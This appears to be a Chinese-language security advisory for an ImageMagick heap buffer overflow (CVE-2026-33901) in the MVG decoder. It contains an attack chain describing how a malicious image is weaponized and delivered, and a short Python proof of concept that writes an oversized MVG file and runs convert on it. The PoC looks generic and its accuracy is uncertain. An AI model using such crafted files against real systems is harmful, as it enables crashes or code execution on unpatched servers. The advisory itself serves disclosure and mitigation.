CVE-2026-33901 CVSS 7.5 高危

CVE-2026-33901 ImageMagick 堆缓冲区溢出漏洞

披露日期: 2026-04-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33901

漏洞类型

堆缓冲区溢出

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ImageMagick

漏洞概述

ImageMagick是一款广泛使用的开源图像处理软件。在低于7.1.2-19和6.9.13-44的版本中，MVG解码器存在严重的堆缓冲区溢出漏洞。当系统处理特制的恶意图像文件时，会触发越界写入错误。攻击者可利用此漏洞导致服务拒绝，或在特定条件下执行任意代码，对系统安全性构成严重威胁，需引起高度重视。

技术细节

该漏洞的根本原因在于ImageMagick处理MVG（Magick Vector Graphics）文件时，解码器未能正确验证输入数据的长度与目标堆缓冲区大小之间的边界条件。具体而言，当解析特制的MVG指令时，程序会错误地计算所需的内存空间，随后尝试向已分配的堆缓冲区写入超出其容量的数据，导致堆缓冲区溢出。由于现代堆管理机制的复杂性，这种越界写操作极易破坏相邻堆块的元数据或关键数据结构。攻击者可以通过精心构造恶意图像文件，精确控制写入的内容和偏移量，进而覆盖函数指针、返回地址或其他敏感的执行流控制数据。在特定环境下，利用这一内存破坏漏洞，攻击者可以绕过ASLR等安全防护机制，实现拒绝服务攻击或获取系统控制权，从而执行任意代码。

攻击链分析

STEP 1

侦察

识别目标系统是否使用了存在漏洞的ImageMagick版本（< 7.1.2-19 或 < 6.9.13-44）。

STEP 2

武器化

利用Python或其他工具构造包含恶意MVG指令的图像文件，精心设计数据以触发堆缓冲区溢出。

STEP 3

传递

通过邮件附件、网页上传或文件共享服务将恶意图像文件发送给目标系统。

STEP 4

利用

当目标系统使用ImageMagick处理该恶意文件时，MVG解码器解析出错，执行越界写入操作。

STEP 5

影响

导致ImageMagick进程崩溃（拒绝服务），或在特定条件下通过控制内存执行任意代码。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-33901
# This PoC generates a malicious MVG file to trigger the heap overflow.

import os

# Generate a payload intended to cause an out-of-bounds write in the MVG decoder
# The specific length and content depend on the heap layout of the target ImageMagick version.
buffer_overflow_trigger = "A" * 10000

mvg_content = f"""push graphic-context
viewbox 0 0 640 480
font {buffer_overflow_trigger}
pop graphic-context
"""

filename = "cve_2026_33901_poc.mvg"
with open(filename, "w") as f:
    f.write(mvg_content)

print(f"[+] Generated malicious file: {filename}")
print("[+] Test by converting the file with an unpatched ImageMagick:")
print(f"    convert {filename} output.png")

影响范围

ImageMagick < 7.1.2-19

ImageMagick < 6.9.13-44

防御指南

临时缓解措施

建议用户尽快升级到修复版本。对于无法立即升级的环境，应禁用ImageMagick对MVG格式的支持，或者在沙箱/隔离环境中处理来自不可信来源的图像文件，以减少潜在的安全风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表